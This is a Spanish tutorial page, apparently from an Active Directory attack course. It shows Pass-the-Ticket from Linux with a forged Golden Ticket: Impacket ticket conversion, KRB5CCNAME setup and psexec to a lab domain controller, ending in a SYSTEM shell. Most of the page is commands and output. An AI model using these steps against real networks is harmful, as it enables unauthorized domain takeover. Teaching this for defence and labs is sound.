PTT en Linux
En entornos Linux/Unix, el proceso implica convertir el ticket a un formato compatible (.ccache). Herramientas como ticketConverter.py de Impacket son esenciales en este proceso. Una vez convertido, se puede utilizar kinit con el archivo .ccache para autenticarse en el entorno Linux/Unix.
Teniendo en cuenta lo explicado en Golden Ticket tradicional utilizando Mimikatz
kali@kali=> impacket-ticketConverter evil.tck evil.ccache
Impacket v0.11.0 - Copyright 2023 Fortra
[*] converting kirbi to ccache...
[+] doneDespues de pasar el ticket a CCACHE, debemos establecer la siguiente variable de entorno apuntando a la ruta del archivo en donde se aloja el ticket CCACHE:
export KRB5CCNAME=/home/kali/Desktop/CPAD/evil.ccacheY finalmente podemos validar la configuracion previa con:
kali@kali=> klist
Ticket cache: FILE:/home/kali/Desktop/CPAD/evil.ccache
Default principal: [email protected]
Valid starting Expires Service principal
11/23/2023 09:40:54 11/20/2033 09:40:54 krbtgt/[email protected]
renew until 11/20/2033 09:40:54Y para validar que se cargaron nuestros permisos basado el ticket podemos ejecutar el siguiente comando:
kali@kali=> impacket-psexec -k -no-pass -target-ip 18.191.44.143 -dc-ip 18.191.44.143 first-dc.spartancybersec.corp
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Requesting shares on 18.191.44.143.....
[*] Found writable share ADMIN$
[*] Uploading file DFiDMQsg.exe
[*] Opening SVCManager on 18.191.44.143.....
[*] Creating service uYJy on 18.191.44.143.....
[*] Starting service uYJy.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.3406]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32> hostname
First-DC
C:\Windows\system32> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet:
Connection-specific DNS Suffix . : spartancybersec.corp
Link-local IPv6 Address . . . . . : fe80::dc16:bad5:b35:e9e9%4
IPv4 Address. . . . . . . . . . . : 10.0.1.100
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.0.1.1En la evidencia previa, estamos usando impacket con el parametro -k podemos autenticarnos por PSEXEC sobre el First-DC.
Última actualización
¿Te fue útil?